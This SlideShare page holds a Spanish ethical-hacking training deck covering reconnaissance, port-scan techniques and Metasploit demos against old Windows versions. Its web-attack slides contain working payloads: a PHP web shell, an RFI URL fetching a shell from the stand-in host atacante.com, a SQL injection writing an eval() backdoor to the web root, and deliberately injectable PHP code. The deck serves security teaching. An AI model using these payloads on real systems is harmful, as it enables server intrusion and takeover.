SlideShare una empresa de Scribd logo
1 de 55
Técnicas avanzadas de penetración a
             sistemas
HACKING ETICO
Los hackers éticos son profesionales de la seguridad que
aplican sus conocimientos de hacking con fines
defensivos (y legales). Diremos hacker siempre, pero hay
que fijarse en el contexto.
QUE ES UN HACKER

 Experto en algún campo de la informática
 Conocimientos profundos de diversas
  Plataformas (Windows, Unix, Linux, android).
 Conocimientos de redes
 Conocimientos de hardware y software.
Pasos previos al
                              ATAQUE
1. Reconocimiento
• Pasivo
• Activo
2. Rastreo (escaner)
3. Acceso
•   Niveles del Sistema
•   Redes
•   DOS
4. Mantener el
   acceso
5. Borrado de
   huellas
FOOTPRINTING


Obtención de los perfiles de seguridad de una organización
haciendo uso de una metodología (footprinting).

El resultado del footprinting es un perfil único de la
organización en cuanto a sus redes (Internet / Intranet /
Extranet /Wireless) y sistemas.
FOOTPRINTING


1.- Obtener información inicial
• whois
• nslookup
2.- Localizar el rango de red
• Traceroute
TIPOS DE ATAQUES
1.- Hacking WIFI         8.-Inyecciones SQL
2.-DOS                   9.-R.F.I
                         10.-XSS
3.-DDOS
                         11.-Inyeccion de
4.-M.I.T                 comandos arbitrarios
5.- Envenenamiento DNS   12.-Hijacking
6.-Reverse Shell         13.-Cookie poisoning
7.-Port scaning
Escaneo de Puertos


El escaneo de puertos es el ataque primario y mas común
utilizado en una auditoria ya sea legal o ilegal.
Nos permite :
Explorar
Identificar
Comprender
Técnicas
                               Tipo de
                               escaneo


                 Medio                                            Otros
 Abierto                          Silencioso         Barridos
                 abierto

TCP connect ()    TCP SYN                TCP FIN     TCP echo    UDP scan

Reverse Ident    Zombie scan         ACK Scan        UDP echo     FTP
                                                                 bounce
                                     Null Scan        TCP ACK     scan

                                    Xmas Scan         TCP SYN
                                                     ICMP echo
                                   SYN/ACK Scan
                                 Fragmentación TCP
TCP connect()
La mas común de cualquier software de escaneo de puertos
consiste en usar la llamada connect() de TCP

Intenta establecer conexión
Si conecta el puerto esta abierto
si no , el puerto esta cerrado
Si no contesta esta silencioso

Muy rápido e invasivo y llamativo en exceso.
* Miles de conexiones
*Logs
Comportamiento
               TCP connect()
Hacker-------[SYN]------>[0] Puerto TCP Victima OPEN
Hacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPEN
Hacker-------[ACK]------->[0] Puerto TCP Victima OPEN

Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSED
Hacker<-----[RST]-------[X] Puerto TCP Victima CLOSED

Hacker------[SYN]-------[*] Puerto TCP Victima SILENT
TCP SYN
Técnica conocida como Half-open scan, escaneo medio abierto por
excelencia
se envía un paquete SYN fingiendo establecer una conexion y se
espera la respuesta del Host, si llega un paquete SYN/ACK
significa que esta abierto y no devolvemos la contestación
ACK, devolvemos RST , esto para evitar que se complete el inicio
de conexión y así burlar el registro del sistema como intento de
conexión



                           *Discreto
                     *Excelentes resultados
Comportamiento
                 TCP SYN
Hacker ---[SYN]---> [O] P. TCP abierto en la Victima
Hacker <---[SYN/ACK]--- [O] P. TCP abierto en la Victima
Hacker ---[RST]---> [O] P. TCP abierto en la Victima

Hacker ---[SYN]---> [X] Puerto TCP cerrado en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima

Hacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima
ACK scan
Destinado a identificar aquellos puertos que están en estado
silencioso de forma precisa cuando un puerto esta en este estado o
no.
Envía paquetes ACK con números de secuencia y confirmación
aleatorios.
si el puerto esta abierto, responderá con un paquete RST, pues no
identificara la conexión como suya
si el puerto esta cerrado responderá RST pero si no responde es que
esta filtrado.
* Apoyo de un escaneo anterior
*Variable del ping si responde RST
 esta vivo si no es in alcanzable.
*Identificar firewall bloqueando SYN.
Comportamiento
                  ACK scan
Hacker ---[ACK]---> [O] Puerto TCP abierto en la Victima
Hacker <---[RST]--- [O] Puerto TCP abierto en la Victima

Hacker ---[ACK]---> [X] Puerto TCP cerrado en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima

Hacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima
Null scan
Similar al FIN, funciona del mismo modo, enviando
paquetes malformados, pero en este caso con
los flags desactivados, si el puerto esta cerrado nos
responderá con RST y En caso de no recibir nada el puerto
esta abierto o silencioso.

Ciertos firewalls vigilan los paquetes de finalización aquí
hace lo que FIN no.
Comportamiento
                 Null scan

Hacker ---[ ]---> [O] Puerto TCP abierto en la Victima

local ---[ ]---> [X] Puerto TCP cerrado en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima

Hacker ---[ ]---> [~] Puerto TCP silencioso en la Victima
La razón
POC
Ataques MIT
1.   DNS cache poisoning
2.   ARP Poisoning
3.   Phishing
4.   Sslstrip
EXPLOTACION
Escáner de
vulnerabilidades
Escáner de
vulnerabilidades
EXPLOTACION
Metasploit
Windows Server 2003
Penetración
                           Windows Server 2003
                           prueba de concepto
      Puerto 445
1.    ms08067
2.    Crear usuario
3.    Habilitar Escritorio Remoto
4.    Cambiar la contraseña del Administrador


     OBJETIVO
     Mostrar el ataque de penetración a
     Windows server 2003 en un ambiente
     controlado.
Metasploit
Windows Server 2008 R2
Metasploit
                 Windows Server 2008 R2

 •Numero de vulnerabilidad : ms09050
 •Encontrar el servidor verificando versión de smb
 •Explotar la vulnerabilidad
 •Denegación de servicios.

OBJETIVO
Mostrar el ataque de Denegación de
servicios a Windows server 2008 en un
ambiente controlado.
Metasploit
Windows XP SP3
Metasploit
            Penetración a Windows XP SP3
                 Prueba de concepto
 1. Encontrar la victima verificando versión de SMB
 2. Lograr la obtención de una reverse shell
 3. Habilitar el uso de escritorio remoto
 4. Inyectar la conexión a escritorio remoto

OBJETIVO
Mostrar el ataque de penetración a
windows XP sp3 en un ambiente controlado.
Metasploit
Windows 7
Metasploit
                   Windows 7 Penetración
                    Prueba de concepto
 1. Usar INGENIERIA SOCIAL

 2. Copiar netcat a la victima y crear puerta trasera
    creando REVERSE SHELL
 3. Vulnerar navegador web.

 4. UPLOAD MI PATH C:DESTINODownloads

OBJETIVO
Mostrar el ataque de penetración a
windows 7 en un ambiente controlado.
Ataques WEB
Ataques XSS
Analicemos la vulnerabilidad de xss

Es una vulnerabilidad de grado medio alto ya que con estos
ataques será posible el re alizar el hijacking que es el robo de
identidad mediante las cookies del navegador
Ataques XSS
Ataques XSS
Ataques XSS
Ataques RFI
                 Remote file inclusion
vulnerabilidad que afecta únicamente a paginas dinámicas
programadas en PHP, consiste en enlazar archivos ubicados en un
servidor remoto.

RFI se aprovecha del uso irresponsable de las
funciones include y requiere, las cuales, debido al limitado
conocimiento del programador y
las pocas o nulas validaciones que realiza antes de incluir una variable
recibida por
parametro de URL, pueden ser aprovechadas por usuarios maliciosos
para incluir scripts
programados para explotar dicha vulnerabilidad.
Ataques RFI
                 Remote file inclusion
         http://www.victima.com/index.php?nav=pagina1php
         http://www.victimacom/index.php?nav=pagina2.php


        <?php
        print system($_GET['command']);
        ?>

http://www.victima.com/index.php?nav=http://atacante.com/shell
                      .txt&command=ls
Inyeccion SQL


union all select "<?php
eval($_GET['exec']); ?>",2,3,4into
outfile"/var/www/html/exec.php"
Analicemos este código
<?php
  $link = mysql_connect('127.0.0.1','root', 'pass');
  mysql_select_db('ejemplo', $link);
  $sql = mysql_query('select * from ejemplo where id='.$_GET['id'], $link);
  if(mysql_errno($link))
  { echo mysql_error($link);
  exit;
  }
  while($row = mysql_fetch_assoc($sql))
  { echo $
  row['id']."
  ".$row['titulo']."
  ".$row['contenido']."
  ".$row['parent'];
  }?
  >
Busqueda de tablas.
Prueba de concepto

OBJETIVO
Mostrar el ataque de inyección SQL y la
técnica de intrusión de SHELL en un
ambiente controlado.
EL RESULTADO
llegando a una conclusión
El resultado.
GRACIAS

Más contenido relacionado

La actualidad más candente

Comandos de redes en windows 7
Comandos de redes en windows 7Comandos de redes en windows 7
Comandos de redes en windows 7leo022883
 
Webinar Gratuito "Wireshark"
Webinar Gratuito "Wireshark"Webinar Gratuito "Wireshark"
Webinar Gratuito "Wireshark"Alonso Caballero
 
Asegúr@IT II - Seguridad en VoiP
Asegúr@IT II - Seguridad en VoiPAsegúr@IT II - Seguridad en VoiP
Asegúr@IT II - Seguridad en VoiPChema Alonso
 
IPTABLES y SQUID‏
IPTABLES y SQUID‏IPTABLES y SQUID‏
IPTABLES y SQUID‏ingpuma
 
OpenVPN como solución de Redes Privadas Virtuales Corporativas
OpenVPN como solución de Redes Privadas Virtuales CorporativasOpenVPN como solución de Redes Privadas Virtuales Corporativas
OpenVPN como solución de Redes Privadas Virtuales CorporativasRommel León
 
Taller comandos para solucionar problemas en la red
Taller comandos para  solucionar problemas en la redTaller comandos para  solucionar problemas en la red
Taller comandos para solucionar problemas en la redguestf6e4f00
 
Herramientas de seguridad SSI
Herramientas de seguridad SSIHerramientas de seguridad SSI
Herramientas de seguridad SSIxoanGz
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]RootedCON
 
Squid proxy transparente en ubuntu
Squid proxy transparente en ubuntuSquid proxy transparente en ubuntu
Squid proxy transparente en ubuntuAlvaro López
 
Asegúr@IT II - Análisis Forense Memoria Ram
Asegúr@IT II - Análisis Forense Memoria RamAsegúr@IT II - Análisis Forense Memoria Ram
Asegúr@IT II - Análisis Forense Memoria RamChema Alonso
 
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)Remigio Salvador Sánchez
 
Trabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaTrabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaarbeycardona2
 
Analisis de red mediante Wireshark y Tcpdump
Analisis de red mediante Wireshark y TcpdumpAnalisis de red mediante Wireshark y Tcpdump
Analisis de red mediante Wireshark y TcpdumpJavier Martin Rivero
 

La actualidad más candente (19)

Comandos de redes en windows 7
Comandos de redes en windows 7Comandos de redes en windows 7
Comandos de redes en windows 7
 
Webinar Gratuito "Wireshark"
Webinar Gratuito "Wireshark"Webinar Gratuito "Wireshark"
Webinar Gratuito "Wireshark"
 
Asegúr@IT II - Seguridad en VoiP
Asegúr@IT II - Seguridad en VoiPAsegúr@IT II - Seguridad en VoiP
Asegúr@IT II - Seguridad en VoiP
 
2015 2-Prácticas GN3
2015 2-Prácticas GN32015 2-Prácticas GN3
2015 2-Prácticas GN3
 
IPTABLES y SQUID‏
IPTABLES y SQUID‏IPTABLES y SQUID‏
IPTABLES y SQUID‏
 
OpenVPN
OpenVPNOpenVPN
OpenVPN
 
Como usar Aircrack
Como usar AircrackComo usar Aircrack
Como usar Aircrack
 
Fail2 ban
Fail2 banFail2 ban
Fail2 ban
 
OpenVPN como solución de Redes Privadas Virtuales Corporativas
OpenVPN como solución de Redes Privadas Virtuales CorporativasOpenVPN como solución de Redes Privadas Virtuales Corporativas
OpenVPN como solución de Redes Privadas Virtuales Corporativas
 
Taller comandos para solucionar problemas en la red
Taller comandos para  solucionar problemas en la redTaller comandos para  solucionar problemas en la red
Taller comandos para solucionar problemas en la red
 
Guía de configuracion Openvpn
Guía de configuracion OpenvpnGuía de configuracion Openvpn
Guía de configuracion Openvpn
 
Herramientas de seguridad SSI
Herramientas de seguridad SSIHerramientas de seguridad SSI
Herramientas de seguridad SSI
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
 
Squid proxy transparente en ubuntu
Squid proxy transparente en ubuntuSquid proxy transparente en ubuntu
Squid proxy transparente en ubuntu
 
Asegúr@IT II - Análisis Forense Memoria Ram
Asegúr@IT II - Análisis Forense Memoria RamAsegúr@IT II - Análisis Forense Memoria Ram
Asegúr@IT II - Análisis Forense Memoria Ram
 
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)Firewall Casero con gnu/linux (Ubuntu Server 14.04)
Firewall Casero con gnu/linux (Ubuntu Server 14.04)
 
Titulacion 2 1 Nmap
Titulacion 2 1   NmapTitulacion 2 1   Nmap
Titulacion 2 1 Nmap
 
Trabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaTrabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensiva
 
Analisis de red mediante Wireshark y Tcpdump
Analisis de red mediante Wireshark y TcpdumpAnalisis de red mediante Wireshark y Tcpdump
Analisis de red mediante Wireshark y Tcpdump
 

Destacado

Manual de hacker 131 trucos elhacker hacking webs, hack msn messenger 7, se...
Manual de hacker   131 trucos elhacker hacking webs, hack msn messenger 7, se...Manual de hacker   131 trucos elhacker hacking webs, hack msn messenger 7, se...
Manual de hacker 131 trucos elhacker hacking webs, hack msn messenger 7, se...kelvinst
 
El libro negro del hacker
El libro negro del hackerEl libro negro del hacker
El libro negro del hackermaster192
 
Comandos cmd para soporte tecnico
Comandos cmd para soporte tecnicoComandos cmd para soporte tecnico
Comandos cmd para soporte tecnicoGeovanni Lozano
 
PRACTICAS "COMANDOS Y REDES" PDF.
PRACTICAS "COMANDOS Y REDES" PDF.PRACTICAS "COMANDOS Y REDES" PDF.
PRACTICAS "COMANDOS Y REDES" PDF.Kim Sorel Rush
 
Comandos para redes
Comandos para redesComandos para redes
Comandos para redesguajiro27
 
Users - Desarrollo PHP + MySQL
Users - Desarrollo PHP + MySQLUsers - Desarrollo PHP + MySQL
Users - Desarrollo PHP + MySQLAndrés Pizarro
 
Curso de crackeo para empezar desde cero leccion 1 clase10
Curso de crackeo para empezar desde cero leccion 1 clase10Curso de crackeo para empezar desde cero leccion 1 clase10
Curso de crackeo para empezar desde cero leccion 1 clase10Tensor
 
Users.101.secretos.de.hardware.pdf
Users.101.secretos.de.hardware.pdfUsers.101.secretos.de.hardware.pdf
Users.101.secretos.de.hardware.pdfLaboratorios ACME
 
Manual user diseño web con html y css
Manual user   diseño web con html y cssManual user   diseño web con html y css
Manual user diseño web con html y cssJose Luis Fernandez
 
Curso tutorial para reparar computadoras portatiles laptop
Curso tutorial para reparar computadoras portatiles laptopCurso tutorial para reparar computadoras portatiles laptop
Curso tutorial para reparar computadoras portatiles laptopReparacionPcLaptopsDesktop
 
Cuaderno de-ejercicios-y-practicas-php
Cuaderno de-ejercicios-y-practicas-phpCuaderno de-ejercicios-y-practicas-php
Cuaderno de-ejercicios-y-practicas-phplgcj1989
 
Manual de Lenguaje Batch
Manual de Lenguaje BatchManual de Lenguaje Batch
Manual de Lenguaje BatchMauricio Melo
 
Portales ud4 - lenguaje html
Portales   ud4 - lenguaje htmlPortales   ud4 - lenguaje html
Portales ud4 - lenguaje htmlRawdoom
 
Tecnologia y desarrollo_en_dispositivos_moviles pdfreebooks1.blogspot.com
Tecnologia y desarrollo_en_dispositivos_moviles  pdfreebooks1.blogspot.comTecnologia y desarrollo_en_dispositivos_moviles  pdfreebooks1.blogspot.com
Tecnologia y desarrollo_en_dispositivos_moviles pdfreebooks1.blogspot.comDiego Caceres
 

Destacado (17)

Manual de hacker 131 trucos elhacker hacking webs, hack msn messenger 7, se...
Manual de hacker   131 trucos elhacker hacking webs, hack msn messenger 7, se...Manual de hacker   131 trucos elhacker hacking webs, hack msn messenger 7, se...
Manual de hacker 131 trucos elhacker hacking webs, hack msn messenger 7, se...
 
El libro negro del hacker
El libro negro del hackerEl libro negro del hacker
El libro negro del hacker
 
Comandos cmd para soporte tecnico
Comandos cmd para soporte tecnicoComandos cmd para soporte tecnico
Comandos cmd para soporte tecnico
 
PRACTICAS "COMANDOS Y REDES" PDF.
PRACTICAS "COMANDOS Y REDES" PDF.PRACTICAS "COMANDOS Y REDES" PDF.
PRACTICAS "COMANDOS Y REDES" PDF.
 
Comandos para redes
Comandos para redesComandos para redes
Comandos para redes
 
Users - Desarrollo PHP + MySQL
Users - Desarrollo PHP + MySQLUsers - Desarrollo PHP + MySQL
Users - Desarrollo PHP + MySQL
 
Reparacion de laptops pdf
Reparacion de laptops pdfReparacion de laptops pdf
Reparacion de laptops pdf
 
Curso de crackeo para empezar desde cero leccion 1 clase10
Curso de crackeo para empezar desde cero leccion 1 clase10Curso de crackeo para empezar desde cero leccion 1 clase10
Curso de crackeo para empezar desde cero leccion 1 clase10
 
Users.101.secretos.de.hardware.pdf
Users.101.secretos.de.hardware.pdfUsers.101.secretos.de.hardware.pdf
Users.101.secretos.de.hardware.pdf
 
Manual user diseño web con html y css
Manual user   diseño web con html y cssManual user   diseño web con html y css
Manual user diseño web con html y css
 
Curso tutorial para reparar computadoras portatiles laptop
Curso tutorial para reparar computadoras portatiles laptopCurso tutorial para reparar computadoras portatiles laptop
Curso tutorial para reparar computadoras portatiles laptop
 
Cuaderno de-ejercicios-y-practicas-php
Cuaderno de-ejercicios-y-practicas-phpCuaderno de-ejercicios-y-practicas-php
Cuaderno de-ejercicios-y-practicas-php
 
Hacking wireless by Alberto García
Hacking wireless by Alberto GarcíaHacking wireless by Alberto García
Hacking wireless by Alberto García
 
Manual de Lenguaje Batch
Manual de Lenguaje BatchManual de Lenguaje Batch
Manual de Lenguaje Batch
 
Html5
Html5Html5
Html5
 
Portales ud4 - lenguaje html
Portales   ud4 - lenguaje htmlPortales   ud4 - lenguaje html
Portales ud4 - lenguaje html
 
Tecnologia y desarrollo_en_dispositivos_moviles pdfreebooks1.blogspot.com
Tecnologia y desarrollo_en_dispositivos_moviles  pdfreebooks1.blogspot.comTecnologia y desarrollo_en_dispositivos_moviles  pdfreebooks1.blogspot.com
Tecnologia y desarrollo_en_dispositivos_moviles pdfreebooks1.blogspot.com
 

Similar a Tecnicas avanzadas de penetracion a sistemas

Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsTecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsn3xasec
 
Escaneo de puertos clase 2 complemento b 28 02-13
Escaneo de puertos clase 2 complemento b 28 02-13Escaneo de puertos clase 2 complemento b 28 02-13
Escaneo de puertos clase 2 complemento b 28 02-13Tensor
 
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"Alonso Caballero
 
Clase practica seguridad escaneo con nma pf
Clase practica seguridad   escaneo con nma pfClase practica seguridad   escaneo con nma pf
Clase practica seguridad escaneo con nma pfRobert Puican Gutierrez
 
Introduccion a la Seguridad informatica
Introduccion a la Seguridad informaticaIntroduccion a la Seguridad informatica
Introduccion a la Seguridad informaticaCarlos Miranda
 
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0wcuestas
 
Infor nmap6 listado_de_comandos by pseudor00t
Infor nmap6 listado_de_comandos by pseudor00t Infor nmap6 listado_de_comandos by pseudor00t
Infor nmap6 listado_de_comandos by pseudor00t pseudor00t overflow
 
Exploracion de puertos de redes
Exploracion de puertos de redesExploracion de puertos de redes
Exploracion de puertos de redesgiulianaCh
 
Escaneo, enumeración de puertos en la red. OMHE
Escaneo, enumeración de puertos en la red. OMHEEscaneo, enumeración de puertos en la red. OMHE
Escaneo, enumeración de puertos en la red. OMHEHéctor López
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortJuan Oliva
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSPaloSanto Solutions
 
Port Knocking Securización De Servidores
Port Knocking   Securización De ServidoresPort Knocking   Securización De Servidores
Port Knocking Securización De ServidoresRo Arq
 
Clase practica seguridad escaneo con nma pf
Clase practica seguridad   escaneo con nma pfClase practica seguridad   escaneo con nma pf
Clase practica seguridad escaneo con nma pfRobert Puican Gutierrez
 
Queesycomousarnmap 150527171529-lva1-app6892
Queesycomousarnmap 150527171529-lva1-app6892Queesycomousarnmap 150527171529-lva1-app6892
Queesycomousarnmap 150527171529-lva1-app6892Karina Gutiérrez
 
Que es y como usar nmap
Que es y como usar nmapQue es y como usar nmap
Que es y como usar nmapLuis Pinilla
 

Similar a Tecnicas avanzadas de penetracion a sistemas (20)

Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsTecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con ids
 
escaneo de puertos.pptx
escaneo de puertos.pptxescaneo de puertos.pptx
escaneo de puertos.pptx
 
Escaneo de puertos clase 2 complemento b 28 02-13
Escaneo de puertos clase 2 complemento b 28 02-13Escaneo de puertos clase 2 complemento b 28 02-13
Escaneo de puertos clase 2 complemento b 28 02-13
 
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
 
Nmap
NmapNmap
Nmap
 
Clase practica seguridad escaneo con nma pf
Clase practica seguridad   escaneo con nma pfClase practica seguridad   escaneo con nma pf
Clase practica seguridad escaneo con nma pf
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Introduccion a la Seguridad informatica
Introduccion a la Seguridad informaticaIntroduccion a la Seguridad informatica
Introduccion a la Seguridad informatica
 
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
 
Infor nmap6 listado_de_comandos by pseudor00t
Infor nmap6 listado_de_comandos by pseudor00t Infor nmap6 listado_de_comandos by pseudor00t
Infor nmap6 listado_de_comandos by pseudor00t
 
Exploracion de puertos de redes
Exploracion de puertos de redesExploracion de puertos de redes
Exploracion de puertos de redes
 
Escaneo, enumeración de puertos en la red. OMHE
Escaneo, enumeración de puertos en la red. OMHEEscaneo, enumeración de puertos en la red. OMHE
Escaneo, enumeración de puertos en la red. OMHE
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con Snort
 
Dns spoofing kali linux
Dns spoofing kali linuxDns spoofing kali linux
Dns spoofing kali linux
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPS
 
Port Knocking Securización De Servidores
Port Knocking   Securización De ServidoresPort Knocking   Securización De Servidores
Port Knocking Securización De Servidores
 
Clase practica seguridad escaneo con nma pf
Clase practica seguridad   escaneo con nma pfClase practica seguridad   escaneo con nma pf
Clase practica seguridad escaneo con nma pf
 
Queesycomousarnmap 150527171529-lva1-app6892
Queesycomousarnmap 150527171529-lva1-app6892Queesycomousarnmap 150527171529-lva1-app6892
Queesycomousarnmap 150527171529-lva1-app6892
 
Que es y como usar nmap
Que es y como usar nmapQue es y como usar nmap
Que es y como usar nmap
 

Más de Rafael Seg

C)FI-RI Computer Forensics Investigator & Incident Response v.2 2015
C)FI-RI Computer Forensics Investigator & Incident Response  v.2  2015C)FI-RI Computer Forensics Investigator & Incident Response  v.2  2015
C)FI-RI Computer Forensics Investigator & Incident Response v.2 2015Rafael Seg
 
Precios y fechas 2015 certificaciones mile2 online
Precios y fechas 2015 certificaciones mile2 onlinePrecios y fechas 2015 certificaciones mile2 online
Precios y fechas 2015 certificaciones mile2 onlineRafael Seg
 
Computer forensics investigator & incident response windows[cfi ir]
Computer forensics investigator & incident response windows[cfi ir]Computer forensics investigator & incident response windows[cfi ir]
Computer forensics investigator & incident response windows[cfi ir]Rafael Seg
 
Tipos de Pentest
Tipos de PentestTipos de Pentest
Tipos de PentestRafael Seg
 
Ccfiw computer forensic investigations windows
Ccfiw computer forensic investigations windowsCcfiw computer forensic investigations windows
Ccfiw computer forensic investigations windowsRafael Seg
 
Testimonios de Agencias militares
Testimonios de Agencias militaresTestimonios de Agencias militares
Testimonios de Agencias militaresRafael Seg
 
Casestudy us army military, Mile2
Casestudy us army military,  Mile2Casestudy us army military,  Mile2
Casestudy us army military, Mile2Rafael Seg
 
N3XAsec CPTE plan de estudios detallado
N3XAsec CPTE plan de estudios detalladoN3XAsec CPTE plan de estudios detallado
N3XAsec CPTE plan de estudios detalladoRafael Seg
 
N3XAsec Catalogo de servicios
N3XAsec Catalogo de servicios N3XAsec Catalogo de servicios
N3XAsec Catalogo de servicios Rafael Seg
 
Plan de estudios
Plan de estudiosPlan de estudios
Plan de estudiosRafael Seg
 
Taller pentest android
Taller pentest androidTaller pentest android
Taller pentest androidRafael Seg
 
Forense android
Forense androidForense android
Forense androidRafael Seg
 
Intrucion a bases de datos
Intrucion a bases de datosIntrucion a bases de datos
Intrucion a bases de datosRafael Seg
 

Más de Rafael Seg (13)

C)FI-RI Computer Forensics Investigator & Incident Response v.2 2015
C)FI-RI Computer Forensics Investigator & Incident Response  v.2  2015C)FI-RI Computer Forensics Investigator & Incident Response  v.2  2015
C)FI-RI Computer Forensics Investigator & Incident Response v.2 2015
 
Precios y fechas 2015 certificaciones mile2 online
Precios y fechas 2015 certificaciones mile2 onlinePrecios y fechas 2015 certificaciones mile2 online
Precios y fechas 2015 certificaciones mile2 online
 
Computer forensics investigator & incident response windows[cfi ir]
Computer forensics investigator & incident response windows[cfi ir]Computer forensics investigator & incident response windows[cfi ir]
Computer forensics investigator & incident response windows[cfi ir]
 
Tipos de Pentest
Tipos de PentestTipos de Pentest
Tipos de Pentest
 
Ccfiw computer forensic investigations windows
Ccfiw computer forensic investigations windowsCcfiw computer forensic investigations windows
Ccfiw computer forensic investigations windows
 
Testimonios de Agencias militares
Testimonios de Agencias militaresTestimonios de Agencias militares
Testimonios de Agencias militares
 
Casestudy us army military, Mile2
Casestudy us army military,  Mile2Casestudy us army military,  Mile2
Casestudy us army military, Mile2
 
N3XAsec CPTE plan de estudios detallado
N3XAsec CPTE plan de estudios detalladoN3XAsec CPTE plan de estudios detallado
N3XAsec CPTE plan de estudios detallado
 
N3XAsec Catalogo de servicios
N3XAsec Catalogo de servicios N3XAsec Catalogo de servicios
N3XAsec Catalogo de servicios
 
Plan de estudios
Plan de estudiosPlan de estudios
Plan de estudios
 
Taller pentest android
Taller pentest androidTaller pentest android
Taller pentest android
 
Forense android
Forense androidForense android
Forense android
 
Intrucion a bases de datos
Intrucion a bases de datosIntrucion a bases de datos
Intrucion a bases de datos
 

Tecnicas avanzadas de penetracion a sistemas

  • 1. Técnicas avanzadas de penetración a sistemas
  • 2. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking con fines defensivos (y legales). Diremos hacker siempre, pero hay que fijarse en el contexto.
  • 3. QUE ES UN HACKER  Experto en algún campo de la informática  Conocimientos profundos de diversas Plataformas (Windows, Unix, Linux, android).  Conocimientos de redes  Conocimientos de hardware y software.
  • 4. Pasos previos al ATAQUE 1. Reconocimiento • Pasivo • Activo 2. Rastreo (escaner) 3. Acceso • Niveles del Sistema • Redes • DOS 4. Mantener el acceso 5. Borrado de huellas
  • 5. FOOTPRINTING Obtención de los perfiles de seguridad de una organización haciendo uso de una metodología (footprinting). El resultado del footprinting es un perfil único de la organización en cuanto a sus redes (Internet / Intranet / Extranet /Wireless) y sistemas.
  • 6. FOOTPRINTING 1.- Obtener información inicial • whois • nslookup 2.- Localizar el rango de red • Traceroute
  • 7. TIPOS DE ATAQUES 1.- Hacking WIFI 8.-Inyecciones SQL 2.-DOS 9.-R.F.I 10.-XSS 3.-DDOS 11.-Inyeccion de 4.-M.I.T comandos arbitrarios 5.- Envenenamiento DNS 12.-Hijacking 6.-Reverse Shell 13.-Cookie poisoning 7.-Port scaning
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14. Escaneo de Puertos El escaneo de puertos es el ataque primario y mas común utilizado en una auditoria ya sea legal o ilegal. Nos permite : Explorar Identificar Comprender
  • 15. Técnicas Tipo de escaneo Medio Otros Abierto Silencioso Barridos abierto TCP connect () TCP SYN TCP FIN TCP echo UDP scan Reverse Ident Zombie scan ACK Scan UDP echo FTP bounce Null Scan TCP ACK scan Xmas Scan TCP SYN ICMP echo SYN/ACK Scan Fragmentación TCP
  • 16. TCP connect() La mas común de cualquier software de escaneo de puertos consiste en usar la llamada connect() de TCP Intenta establecer conexión Si conecta el puerto esta abierto si no , el puerto esta cerrado Si no contesta esta silencioso Muy rápido e invasivo y llamativo en exceso. * Miles de conexiones *Logs
  • 17. Comportamiento TCP connect() Hacker-------[SYN]------>[0] Puerto TCP Victima OPEN Hacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPEN Hacker-------[ACK]------->[0] Puerto TCP Victima OPEN Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSED Hacker<-----[RST]-------[X] Puerto TCP Victima CLOSED Hacker------[SYN]-------[*] Puerto TCP Victima SILENT
